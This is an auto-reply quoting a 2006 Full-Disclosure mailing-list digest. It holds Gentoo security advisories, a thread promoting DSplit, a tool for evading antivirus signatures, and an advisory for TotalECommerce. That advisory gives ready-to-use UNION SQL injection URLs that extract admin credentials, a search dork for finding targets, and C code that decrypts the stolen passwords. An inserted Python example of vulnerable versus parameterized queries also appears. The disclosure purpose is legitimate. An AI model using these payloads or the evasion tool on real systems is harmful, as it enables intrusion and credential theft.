Message-ID: <s40a8cc3.052@mail.bbl-inc.com>
Date: Sun Mar 5 12:01:37 2006
From: DMCCOY at bbl-inc.com (DONNY MCCOY)
Subject: Re: Full-Disclosure Digest, Vol 13, Issue 8
I will be in Denver through Thursday and will return to Syracuse on
Friday. I will check voicemail and e-mail periodically as time allows.
If your e-mail is urgent please contact the help desk in Syracuse at
x19511.
Thanks.
Donny
>>> full-disclosure 03/05/06 07:00 >>>
Send Full-Disclosure mailing list submissions to
full-disclosure@...ts.grok.org.uk
To subscribe or unsubscribe via the World Wide Web, visit
https://lists.grok.org.uk/mailman/listinfo/full-disclosure
or, via email, send a message with subject or body 'help' to
full-disclosure-request@...ts.grok.org.uk
You can reach the person managing the list at
full-disclosure-owner@...ts.grok.org.uk
When replying, please edit your Subject line so it is more specific
than "Re: Contents of Full-Disclosure digest..."
Note to digest recipients - when replying to digest posts, please trim
your post appropriately. Thank you.
Today's Topics:
1. Re: DSplit - Tiny AV signatures Detector (ad@...poverflow.com)
2. Re: DSplit - Tiny AV signatures Detector (ad@...poverflow.com)
3. Re: DSplit - Tiny AV signatures Detector (Alexander Hristov)
4. [ GLSA 200603-01 ] WordPress: SQL injection vulnerability
(Thierry Carrez)
5. Advisory: TotalECommerce (index.asp id) Remote SQL Injection
Vulnerability. (nukedx@...edx.com)
6. [ GLSA 200603-02 ] teTeX, pTeX, CSTeX: Multiple overflows in
included XPdf code (Thierry Carrez)
7. [ GLSA 200603-03 ] MPlayer: Multiple integer overflows
(Thierry Carrez)
8. Please remove me from the list (W1nd man)
9. Re: Please remove me from the list (Alexander Hristov)
10. (no subject) (Steven Rakick)
11. Re: (no subject) (Steven Rakick)
12. Re: (no subject) (PERFECT.MATERIAL)
13. HITBSecConf2006 - Malaysia: Call for Papers (Praburaajan)
----------------------------------------------------------------------
Message: 1
Date: Sat, 04 Mar 2006 13:09:57 +0100
From: "ad@...poverflow.com" <ad@...poverflow.com>
Subject: Re: [Full-disclosure] DSplit - Tiny AV signatures Detector
To: Alexander Hristov <joffer@...il.com>
Cc: Full Disclosure <full-disclosure@...ts.grok.org.uk>,
bugtraq@...urityfocus.com
Message-ID: <44098395.6010604@...poverflow.com>
Content-Type: text/plain; charset=ISO-8859-1
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
yeah already knowing they are most fucking bastards
Alexander Hristov wrote:
> Clamav detects it and can unrar it with the unrar module
>
> On 3/3/06, ad@...poverflow.com <ad@...poverflow.com> wrote: DSplit
> is the small brother of an old tool known as UKsplitter, which is now
> abandoned, does not work in VMware, and fails to run under Windows
> 2003.
>
> DSplit has been coded for persons like me, targeted by AV firms, and
> I'm not responsible for the bad uses of it. I recall this method has
> been known for a long time and it's up to the AV firms to review their
> detection software.
>
>
http://heapoverflow.com/dem0s/Dsplit-patching_DFind_on_Symantec_Corporate.htm
> http://getdsplit.class101.org
>
> usual critics , flames, can be directly sent to the Recycle Bin :>
>>>
> _______________________________________________ Full-Disclosure -
> We believe in it. Charter:
> http://lists.grok.org.uk/full-disclosure-charter.html Hosted and
> sponsored by Secunia - http://secunia.com/
>>>
>
>> -- Best Regards, Aleksander Hristov < root at securitydot.net > <
>> http://securitydot.net >
>
>
>
>
------------------------------
Message: 2
Date: Sat, 04 Mar 2006 13:16:33 +0100
From: "ad@...poverflow.com" <ad@...poverflow.com>
Subject: Re: [Full-disclosure] DSplit - Tiny AV signatures Detector
To: Alexander Hristov <joffer@...il.com>
Cc: Full Disclosure <full-disclosure@...ts.grok.org.uk>,
bugtraq@...urityfocus.com
Message-ID: <44098521.6010509@...poverflow.com>
Content-Type: text/plain; charset=ISO-8859-1
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
and it clearly shows clamav is a crap antivirus where tools like
DSplit are a problem for them,
and they will detect DSplit when they can't find a better way to
detect viruses.
Alexander Hristov wrote:
> Clamav detects it and can unrar it with the unrar module
>
> On 3/3/06, ad@...poverflow.com <ad@...poverflow.com> wrote: DSplit
> is the small brother of an old tool known as UKsplitter, which is now
> abandoned, does not work in VMware, and fails to run under Windows
> 2003.
>
> DSplit has been coded for persons like me, targeted by AV firms, and
> I'm not responsible for the bad uses of it. I recall this method has
> been known for a long time and it's up to the AV firms to review their
> detection software.
>
>
http://heapoverflow.com/dem0s/Dsplit-patching_DFind_on_Symantec_Corporate.htm
> http://getdsplit.class101.org
>
> usual critics , flames, can be directly sent to the Recycle Bin :>
>>>
> _______________________________________________ Full-Disclosure -
> We believe in it. Charter:
> http://lists.grok.org.uk/full-disclosure-charter.html Hosted and
> sponsored by Secunia - http://secunia.com/
>>>
>
>> -- Best Regards, Aleksander Hristov < root at securitydot.net > <
>> http://securitydot.net >
>
>
>
>
------------------------------
Message: 3
Date: Sat, 4 Mar 2006 14:41:45 +0200
From: "Alexander Hristov" <joffer@...il.com>
Subject: Re: [Full-disclosure] DSplit - Tiny AV signatures Detector
To: "ad@...poverflow.com" <ad@...poverflow.com>
Cc: Full Disclosure <full-disclosure@...ts.grok.org.uk>,
bugtraq@...urityfocus.com
Message-ID:
<734063a30603040441v3beb90d5n7faab639859c8dd7@...l.gmail.com>
Content-Type: text/plain; charset=ISO-8859-1
Well, clamav is the best AV for no money and it's very well developed,
again for no money :)
On 3/4/06, ad@...poverflow.com <ad@...poverflow.com> wrote:
> -----BEGIN PGP SIGNED MESSAGE-----
> Hash: SHA1
>
> and it clearly shows clamav is a crap antivirus where tools like
> DSplit are a problem for them,
> and they will detect DSplit when they can't find a better way to
> detect viruses.
>
>
>
> Alexander Hristov wrote:
> > Clamav detects it and can unrar it with the unrar module
> >
> > On 3/3/06, ad@...poverflow.com <ad@...poverflow.com> wrote: DSplit
> > is the small brother of an old tool known as UKsplitter, which is now
> > abandoned, does not work in VMware, and fails to run under Windows
> > 2003.
> >
> > DSplit has been coded for persons like me, targeted by AV firms, and
> > I'm not responsible for the bad uses of it. I recall this method has
> > been known for a long time and it's up to the AV firms to review their
> > detection software.
> >
> >
http://heapoverflow.com/dem0s/Dsplit-patching_DFind_on_Symantec_Corporate.htm
> > http://getdsplit.class101.org
> >
> > usual critics , flames, can be directly sent to the Recycle Bin :>
> >>>
> > _______________________________________________ Full-Disclosure -
> > We believe in it. Charter:
> > http://lists.grok.org.uk/full-disclosure-charter.html Hosted and
> > sponsored by Secunia - http://secunia.com/
> >>>
> >
> >> -- Best Regards, Aleksander Hristov < root at securitydot.net > <
> >> http://securitydot.net >
> >
> >
> >
> >
>
>
--
Best Regards,
Aleksander Hristov < root at securitydot.net > < http://securitydot.net >
------------------------------
Message: 4
Date: Sat, 04 Mar 2006 16:45:31 +0100
From: Thierry Carrez <koon@...too.org>
Subject: [Full-disclosure] [ GLSA 200603-01 ] WordPress: SQL injection
vulnerability
To: gentoo-announce@...ts.gentoo.org
Cc: full-disclosure@...ts.grok.org.uk, bugtraq@...urityfocus.com,
security-alerts@...uxsecurity.com
Message-ID: <4409B61B.5060903@...too.org>
Content-Type: text/plain; charset="iso-8859-1"
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory GLSA 200603-01
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
http://security.gentoo.org/
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Severity: Normal
Title: WordPress: SQL injection vulnerability
Date: March 04, 2006
Bugs: #121661
ID: 200603-01
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Synopsis
========
WordPress is vulnerable to an SQL injection vulnerability.
Background
==========
WordPress is a PHP and MySQL based content management and publishing
system.
Affected packages
=================
-------------------------------------------------------------------
     Package                 /  Vulnerable  /         Unaffected
-------------------------------------------------------------------
  1  www-apps/wordpress         <= 1.5.2              >= 2.0.1
Description
===========
Patrik Karlsson reported that WordPress 1.5.2 makes use of an
insufficiently filtered User Agent string in SQL queries related to
comments posting. This vulnerability was already fixed in the
2.0-series of WordPress.
Impact
======
An attacker could send a comment with a malicious User Agent parameter,
resulting in SQL injection and potentially in the subversion of the
WordPress database. This vulnerability wouldn't affect WordPress sites
which do not allow comments or which require that comments go through a
moderator.
Workaround
==========
Disable or moderate comments on your WordPress blogs.
Resolution
==========
All WordPress users should upgrade to the latest version:
# emerge --sync
# emerge --ask --oneshot --verbose ">=www-apps/wordpress-2.0.1"
Availability
============
This GLSA and any updates to it are available for viewing at
the Gentoo Security Website:
http://security.gentoo.org/glsa/glsa-200603-01.xml
Concerns?
=========
Security is a primary focus of Gentoo Linux and ensuring the
confidentiality and security of our users machines is of utmost
importance to us. Any security concerns should be addressed to
security@...too.org or alternatively, you may file a bug at
http://bugs.gentoo.org.
License
=======
Copyright 2006 Gentoo Foundation, Inc; referenced text
belongs to its owner(s).
The contents of this document are licensed under the
Creative Commons - Attribution / Share Alike license.
http://creativecommons.org/licenses/by-sa/2.0
------------------------------
Message: 5
Date: Sat, 04 Mar 2006 16:26:07 +0200
From: nukedx@...edx.com
Subject: [Full-disclosure] Advisory: TotalECommerce (index.asp id)
Remote SQL Injection Vulnerability.
To: submit@...w0rm.com, full-disclosure@...ts.grok.org.uk,
bugtraq@...urityfocus.com
Message-ID: <20060304162607.2lyie75fm1m4gwow@...mail.nukedx.com>
Content-Type: text/plain; charset=ISO-8859-9
--Security Report--
Advisory: TotalECommerce (index.asp id) Remote SQL Injection
Vulnerability.
---
Author: Mustafa Can Bjorn "nukedx a.k.a nuker" IPEKCI
---
Date: 04/03/06 04:36 AM
---
Contacts:{
ICQ: 10072
MSN/Email: nukedx@...edx.com
Web: http://www.nukedx.com
}
---
Vendor: TotalECommerce (http://www.totalecommerce.com)
Version: 1.0 and prior versions must be affected.
About: Via this method a remote attacker can inject arbitrary SQL queries
into the id parameter in index.asp
Level: Critical
---
How&Example:
GET -> http://[victim]/[dir]/index.asp?secao=[PageID]&id=[SQL]
EXAMPLE 1 ->
http://[victim]/[dir]/index.asp?secao=25&id=-1+UNION+select+senha,senha,senha,senha,senha,senha,senha,
senha,senha,senha,senha,senha,senha,senha,senha,senha,senha,senha,senha,senha,senha,senha,senha,senha,senha,senha,
senha,senha,senha,senha,senha,senha,senha+from+administradores
EXAMPLE 2 ->
http://[victim]/[dir]/index.asp?secao=25&id=-1+UNION+select+login,login,login,login,login,login,login,
login,login,login,login,login,login,login,login,login,login,login,login,login,login,login,login,login,login,login,
login,login,login,login,login,login,login+from+administradores
With example 1 a remote attacker can get the admin's encrypted password and
with example 2 a remote attacker can get the admin's login name.
[PageID] must be a working page id; you can get some from the front page.
---
Timeline:
* 04/03/2006: Vulnerability found.
* 04/03/2006: Could not contact the vendor.
* 04/03/2006: File closed.
---
Exploit&Decrypter:
http://www.nukedx.com/?getxpl=18
---
Dorks: intext:"totalecommerce"
---
Original advisory: http://www.nukedx.com/?getxpl=18
---
Decrypter source in C
---
/*********************************************
* TotalECommerce PWD Decrypter *
* Coded by |SaMaN| for nukedx *
* http://www.k9world.org *
* IRC.K9World.Org *
*Advisory: http://www.nukedx.com/?viewdoc=18 *
**********************************************/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <ctype.h> /* toascii() */
int main(void)
{
char buf[255]; /* crypted password as typed */
char buf2[255] = ""; /* decoded result; must start empty for strncat() */
char buf3[2]; /* one decoded character plus terminator */
int i, t, z;
char saman;
printf("%s", "|=------------------------------------=|\n");
printf("%s", " Coded by |SaMaN| @ IRC.K9World.Org\n");
printf("%s", "|=------------------------------------=|\n\n");
printf("%s", "Enter crypted password: ");
if (scanf("%200s", buf) != 1)
return 1;
/* each stored byte is 255 minus the plaintext byte, so reverse that */
for (i = 0; i < (int)strlen(buf); i++)
{
t = (unsigned char)buf[i];
z = 255 - t;
saman = (char)toascii(z); /* keep the low 7 bits, as the original did */
snprintf(buf3, sizeof buf3, "%c", saman);
strncat(buf2, buf3, sizeof buf2 - strlen(buf2) - 1);
}
printf("Result: %s\n", buf2);
return 0;
}
---End of code---
Greets to: |SaMaN|
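Both SQL injection items in this digest, the WordPress 1.5.2 User-Agent string in a comment INSERT (GLSA 200603-01 above) and the unquoted index.asp id parameter in this advisory, share one root cause. The following added example (not part of either advisory; it uses an in-memory SQLite database with constructed table and column names) shows the vulnerable string-built query beside its parameterized fix for both the quoted-string and the bare-number case, run on constructed inputs.

```python
"""Added example: the two SQL injection shapes reported in this digest,
a quoted string (the User-Agent header pasted into a comment INSERT) and
an unquoted number (the id parameter pasted into a SELECT), each shown as
the vulnerable string-built query beside its parameterized fix.
Table and column names are constructed for the example."""
import sqlite3


def make_db():
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE pages (id INTEGER PRIMARY KEY, title TEXT, body TEXT);
        CREATE TABLE comments (author TEXT, content TEXT, user_agent TEXT);
        INSERT INTO pages VALUES (25, 'Welcome', 'public page');
        INSERT INTO pages VALUES (26, 'Draft', 'not yet published');
    """)
    return db


# --- Shape 1: untrusted header pasted into a quoted string literal --------

def insert_comment_vulnerable(db, author, content, user_agent):
    # Every quote in user_agent becomes SQL syntax.  A header that merely
    # contains an apostrophe already breaks the statement; that is the same
    # control an attacker uses to change what the statement does.
    sql = ("INSERT INTO comments (author, content, user_agent) "
           "VALUES ('%s', '%s', '%s')" % (author, content, user_agent))
    db.execute(sql)


def insert_comment_fixed(db, author, content, user_agent):
    # Placeholders: the driver passes the header as data, never as SQL.
    db.execute("INSERT INTO comments (author, content, user_agent) "
               "VALUES (?, ?, ?)", (author, content, user_agent))


# --- Shape 2: untrusted number pasted unquoted into a WHERE clause --------

def page_body_vulnerable(db, raw_id):
    # No quotes around %s, so no quote is even needed to append SQL.
    sql = "SELECT body FROM pages WHERE id = %s" % raw_id
    return [row[0] for row in db.execute(sql)]


def page_body_fixed(db, raw_id):
    # Validate the type first, then bind it; a non-numeric id is rejected
    # before it reaches the database at all.
    try:
        page_id = int(raw_id)
    except ValueError:
        return []
    return [row[0] for row in db.execute(
        "SELECT body FROM pages WHERE id = ?", (page_id,))]


def demo():
    """Returns (vulnerable_insert_failed, fixed_stored_verbatim,
    vulnerable_select_rows, fixed_select_rows) for constructed inputs."""
    db = make_db()
    ua = "Mozilla/4.0 (compatible; it's a test)"   # constructed, benign
    try:
        insert_comment_vulnerable(db, "anon", "hi", ua)
        vuln_insert_failed = False
    except sqlite3.Error:
        vuln_insert_failed = True      # the apostrophe broke the SQL grammar
    insert_comment_fixed(db, "anon", "hi", ua)
    stored = db.execute("SELECT user_agent FROM comments").fetchall()
    fixed_verbatim = stored == [(ua,)]

    # constructed: a condition tacked onto a number that was never quoted
    raw_id = "-1 OR 1=1"
    vuln_rows = page_body_vulnerable(db, raw_id)   # returns every page
    fixed_rows = page_body_fixed(db, raw_id)       # rejects the input
    return vuln_insert_failed, fixed_verbatim, vuln_rows, fixed_rows


if __name__ == "__main__":
    print(demo())
```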
------------------------------
Message: 6
Date: Sat, 04 Mar 2006 17:32:34 +0100
From: Thierry Carrez <koon@...too.org>
Subject: [Full-disclosure] [ GLSA 200603-02 ] teTeX, pTeX, CSTeX:
Multiple overflows in included XPdf code
To: gentoo-announce@...ts.gentoo.org
Cc: full-disclosure@...ts.grok.org.uk, bugtraq@...urityfocus.com,
security-alerts@...uxsecurity.com
Message-ID: <4409C122.4090103@...too.org>
Content-Type: text/plain; charset="iso-8859-1"
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory GLSA 200603-02
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
http://security.gentoo.org/
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Severity: Normal
Title: teTeX, pTeX, CSTeX: Multiple overflows in included XPdf
code
Date: March 04, 2006
Bugs: #115775
ID: 200603-02
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Synopsis
========
CSTeX, pTeX, and teTeX include vulnerable XPdf code to handle PDF
files, making them vulnerable to the execution of arbitrary code.
Background
==========
teTeX is a complete TeX distribution. It is used for creating and
manipulating LaTeX documents. CSTeX is a TeX distribution with Czech
and Slovak support. pTeX is an ASCII publishing TeX distribution.
Affected packages
=================
-------------------------------------------------------------------
     Package                 /  Vulnerable  /         Unaffected
-------------------------------------------------------------------
  1  app-text/tetex             < 2.0.2-r8            >= 2.0.2-r8
  2  app-text/cstetex           < 2.0.2-r2            >= 2.0.2-r2
  3  app-text/ptex              < 3.1.5-r1            >= 3.1.5-r1
-------------------------------------------------------------------
     3 affected packages on all of their supported architectures.
-------------------------------------------------------------------
Description
===========
CSTeX, teTeX, and pTeX include XPdf code to handle PDF files. This XPdf
code is vulnerable to several heap overflows (GLSA 200512-08) as well
as several buffer and integer overflows discovered by Chris Evans
(CESA-2005-003).
Impact
======
An attacker could entice a user to open a specially crafted PDF file
with teTeX, pTeX or CSTeX, potentially resulting in the execution of
arbitrary code with the rights of the user running the affected
application.
Workaround
==========
There is no known workaround at this time.
Resolution
==========
All teTeX users should upgrade to the latest version:
# emerge --sync
# emerge --ask --oneshot --verbose ">=app-text/tetex-2.0.2-r8"
All CSTeX users should upgrade to the latest version:
# emerge --sync
# emerge --ask --oneshot --verbose ">=app-text/cstetex-2.0.2-r2"
All pTeX users should upgrade to the latest version:
# emerge --sync
# emerge --ask --oneshot --verbose ">=app-text/ptex-3.1.5-r1"
References
==========
[ 1 ] CVE-2005-3193
http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2005-3193
[ 2 ] GLSA 200512-08
http://www.gentoo.org/security/en/glsa/glsa-200512-08.xml
[ 3 ] CESA-2005-003
http://scary.beasts.org/security/CESA-2005-003.txt
Availability
============
This GLSA and any updates to it are available for viewing at
the Gentoo Security Website:
http://security.gentoo.org/glsa/glsa-200603-02.xml
Concerns?
=========
Security is a primary focus of Gentoo Linux and ensuring the
confidentiality and security of our users machines is of utmost
importance to us. Any security concerns should be addressed to
security@...too.org or alternatively, you may file a bug at
http://bugs.gentoo.org.
License
=======
Copyright 2006 Gentoo Foundation, Inc; referenced text
belongs to its owner(s).
The contents of this document are licensed under the
Creative Commons - Attribution / Share Alike license.
http://creativecommons.org/licenses/by-sa/2.0
------------------------------
Message: 7
Date: Sat, 04 Mar 2006 18:26:18 +0100
From: Thierry Carrez <koon@...too.org>
Subject: [Full-disclosure] [ GLSA 200603-03 ] MPlayer: Multiple
integer overflows
To: gentoo-announce@...ts.gentoo.org
Cc: full-disclosure@...ts.grok.org.uk, bugtraq@...urityfocus.com,
security-alerts@...uxsecurity.com
Message-ID: <4409CDBA.8060405@...too.org>
Content-Type: text/plain; charset="iso-8859-1"
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory GLSA 200603-03
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
http://security.gentoo.org/
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Severity: Normal
Title: MPlayer: Multiple integer overflows
Date: March 04, 2006
Bugs: #115760, #122029
ID: 200603-03
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Synopsis
========
MPlayer is vulnerable to integer overflows in FFmpeg and ASF decoding
that could potentially result in the execution of arbitrary code.
Background
==========
MPlayer is a media player capable of handling multiple multimedia file
formats.
Affected packages
=================
-------------------------------------------------------------------
     Package                 /  Vulnerable  /         Unaffected
-------------------------------------------------------------------
  1  media-video/mplayer       < 1.0.20060217       >= 1.0.20060217
Description
===========
MPlayer makes use of the FFmpeg library, which is vulnerable to a heap
overflow in the avcodec_default_get_buffer() function discovered by
Simon Kilvington (see GLSA 200601-06). Furthermore, AFI Security
Research discovered two integer overflows in ASF file format decoding,
in the new_demux_packet() function from libmpdemux/demuxer.h and the
demux_asf_read_packet() function from libmpdemux/demux_asf.c.
Impact
======
An attacker could craft a malicious media file which, when opened using
MPlayer, would lead to a heap-based buffer overflow. This could result
in the execution of arbitrary code with the permissions of the user
running MPlayer.
Workaround
==========
There is no known workaround at this time.
Resolution
==========
All MPlayer users should upgrade to the latest version:
# emerge --sync
# emerge --ask --oneshot --verbose ">=media-video/mplayer-1.0.20060217"
References
==========
[ 1 ] CVE-2005-4048
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-4048
[ 2 ] CVE-2006-0579
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-0579
[ 3 ] GLSA 200601-06
http://www.gentoo.org/security/en/glsa/glsa-200601-06.xml
Availability
============
This GLSA and any updates to it are available for viewing at
the Gentoo Security Website:
http://security.gentoo.org/glsa/glsa-200603-03.xml
Concerns?
=========
Security is a primary focus of Gentoo Linux and ensuring the
confidentiality and security of our users machines is of utmost
importance to us. Any security concerns should be addressed to
security@...too.org or alternatively, you may file a bug at
http://bugs.gentoo.org.
License
=======
Copyright 2006 Gentoo Foundation, Inc; referenced text
belongs to its owner(s).
The contents of this document are licensed under the
Creative Commons - Attribution / Share Alike license.
http://creativecommons.org/licenses/by-sa/2.0
------------------------------
Message: 8
Date: Sat, 4 Mar 2006 22:16:10 +0200
From: W1nd man <w1ndm4n@...la.com>
Subject: [Full-disclosure] Please remove me from the list
To: <full-disclosure@...ts.grok.org.uk>
Message-ID: <1141503369.961000-13997465-23441@...la.com>
Content-Type: text/plain; charset="us-ascii"
An HTML attachment was scrubbed...
URL:
http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20060304/f69d9753/attachment-0001.html
------------------------------
Message: 9
Date: Sun, 5 Mar 2006 03:52:28 +0200
From: "Alexander Hristov" <joffer@...il.com>
Subject: Re: [Full-disclosure] Please remove me from the list
To: "W1nd man" <w1ndm4n@...la.com>
Cc: full-disclosure@...ts.grok.org.uk
Message-ID:
<734063a30603041752v7a8cc6efnd28861cae0f8be32@...l.gmail.com>
Content-Type: text/plain; charset=ISO-8859-1
U can remove yourself from here :
https://lists.grok.org.uk/mailman/listinfo/full-disclosure
On 3/4/06, W1nd man <w1ndm4n@...la.com> wrote:
>
>
>
> Please remove me from the list
>
>
> ________________________________
>
> Walla! Mail - get your free 3G mail today
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter:
> http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>
>
--
Best Regards,
Aleksander Hristov < root at securitydot.net > < http://securitydot.net >
------------------------------
Message: 10
Date: Sat, 4 Mar 2006 18:01:51 -0800
From: Steven Rakick <stevenrakick@...oo.com>
Subject: [Full-disclosure] (no subject)
To: full-disclosure@...ts.grok.org.uk
Message-ID: <1e7e8bed62fc8c339e776bd2ef170a59@....c0replay.net>
Content-Type: text/plain; charset="iso-8859-1"
Hello HACKERZ!,
Your personal DONGEZ to this message.
Sincerely,
BanHaus manager
------------------------------
Message: 11
Date: Sat, 4 Mar 2006 20:28:32 -0800 (PST)
From: Steven Rakick <stevenrakick@...oo.com>
Subject: Re: [Full-disclosure] (no subject)
To: full-disclosure@...ts.grok.org.uk
Message-ID: <20060305042832.34191.qmail@...53201.mail.yahoo.com>
Content-Type: text/plain; charset=iso-8859-1
Not that it matters but...
Received: from www.c0replay.net (unknown
[206.251.72.74])
by lists.grok.org.uk (Postfix) with ESMTP id 739EF127
for <full-disclosure@...ts.grok.org.uk>;
Sun, 5 Mar 2006 02:02:03 +0000 (GMT)
Date: Sat, 4 Mar 2006 18:01:51 -0800
To: full-disclosure@...ts.grok.org.uk
From: Steven Rakick <stevenrakick@...oo.com>
Message-ID:
<1e7e8bed62fc8c339e776bd2ef170a59@....c0replay.net>
X-Priority: 3
X-Mailer: PHPMailer [version 1.73]
__________________________________________________
Do You Yahoo!?
Tired of spam? Yahoo! Mail has the best spam protection around
http://mail.yahoo.com
------------------------------
Message: 12
Date: Sun, 5 Mar 2006 00:34:03 -0500
From: PERFECT.MATERIAL <perfect.material@...il.com>
Subject: Re: [Full-disclosure] (no subject)
To: "Steven Rakick" <stevenrakick@...oo.com>
Cc: full-disclosure@...ts.grok.org.uk
Message-ID:
<631ac1d90603042134n7a22e7aale14d2aa7914dda58@...l.gmail.com>
Content-Type: text/plain; charset="iso-8859-1"
Dick Breath,
You should sign your electronic mail with some unhackable crypto
technology. That way you will never need to show off your cut and paste
technology to the others. You are irresponsible. Not that it matters
but...
PERFECT.MATERIAL
On 3/4/06, Steven Rakick <stevenrakick@...oo.com> wrote:
>
> Not that it matters but...
>
> Received: from www.c0replay.net (unknown
> [206.251.72.74])
> by lists.grok.org.uk (Postfix) with ESMTP id 739EF127
> for <full-disclosure@...ts.grok.org.uk>;
> Sun, 5 Mar 2006 02:02:03 +0000 (GMT)
> Date: Sat, 4 Mar 2006 18:01:51 -0800
> To: full-disclosure@...ts.grok.org.uk
> From: Steven Rakick <stevenrakick@...oo.com>
> Message-ID:
> <1e7e8bed62fc8c339e776bd2ef170a59@....c0replay.net>
> X-Priority: 3
> X-Mailer: PHPMailer [version 1.73]
>
>
> __________________________________________________
> Do You Yahoo!?
> Tired of spam? Yahoo! Mail has the best spam protection around
> http://mail.yahoo.com
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>
------------------------------
Message: 13
Date: Sun, 05 Mar 2006 13:34:43 +0800
From: Praburaajan <prabu@...kinthebox.org>
Subject: [Full-disclosure] HITBSecConf2006 - Malaysia: Call for Papers
To: full-disclosure@...ts.grok.org.uk,
dailydave@...ts.immunitysec.com,
pen-test@...urityfocus.com,
bugtraq@...urityfocus.com, Voipsec@...psa.org,
submit@...w0rm.com,
webappsec@...urityfocus.com, ipv6@...f.org,
security-basics@...urityfocus.com
Message-ID: <440A7873.4000202@...kinthebox.org>
Content-Type: text/plain; charset=windows-1252; format=flowed
Greetings from Hack in The Box -- We are pleased to announce that the
Call for Papers (CfP) for HITBSecConf2006 - Malaysia is now open! Set to
take place from September 18th - 21st 2006 at The Westin Kuala Lumpur,
this year's conference promises to once again deliver an international
deep-knowledge security conference. HITBSecConf has been described as
"the most intimate of hacker gatherings" and is the largest network
security conference in Asia!
SUBMISSION
HITBSecConf is a deep-knowledge technical conference. Talks that are
more technical or that discuss new and never before seen attack methods
are of more interest than a subject that has been covered several times
before. Summaries not exceeding 250 words should be submitted (in plain
text format) to cfp -at- hackinthebox.org for review and possible
inclusion in the programme.
Submissions are due no later than 1st of May 2006.
TOPICS
Topics of interest include, but are not limited to the following:
* Analysis of network and security vulnerabilities
* Firewall technologies
* Intrusion detection
* Data Recovery and Incident Response
* GPRS, 3G and CDMA Security
* Identification and Entity Authentication
* Network Protocol and Analysis
* Smart Card Security
* Virus and Worms
* WLAN and Bluetooth Security
* Analysis of malicious code
* Applications of cryptographic techniques
* Analysis of attacks against networks and machines
* Denial-of-service attacks and countermeasures
* File system security
* Security in heterogeneous and large-scale environments
* Techniques for developing secure systems
PLEASE NOTE: We do not accept product or vendor related pitches. If your
talk involves an advertisement for a new product or service your company
is offering, please do not submit.
Your submission should include:
* Name, title, address, email and phone/contact number
* Draft of the proposed presentation (in PDF or PowerPoint format),
proof of concept for tools and exploits, etc.
* Short biography, qualification, occupation, achievement and
affiliations (limit 150 words).
* Summary or abstract for your presentation (limit 250 words)
* Time (45-60 minutes including time for discussion and questions)
* Technical requirements (video, internet, wireless, audio, etc.)
Each non-resident speaker will receive accommodation for 3 nights at The
Westin Kuala Lumpur. For each non-resident speaker, HITB will cover
travel expenses (through our airline partner, Malaysia Airlines) up to
USD 1,000.00.
HITBSecConf2006 CTF Daemons/Flags
As part of our annual conference, HITB organizes an attack and defense
"hack-game" commonly referred to as *Capture The Flag* or CTF. As part
of our continued efforts to improve on the game and raise the bar each
year, we are inviting speakers to contribute a daemon and exploit for
this year's CTF competition. For further details on the submission
process, kindly e-mail dinesh -at- hackinthebox.org or ctfinfo -at-
hackinthebox.org.
On behalf of The HITB Team, we thank you and look forward to receiving
your submissions! See you guys in September!
HITBSecConf2006 - Malaysia: Deep-Knowledge Network Security
http://conference.hackinthebox.org/hitbsecconf2006kl/
http://conference.hitb.org/hitbsecconf2006kl/
------------------------------
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
End of Full-Disclosure Digest, Vol 13, Issue 8
**********************************************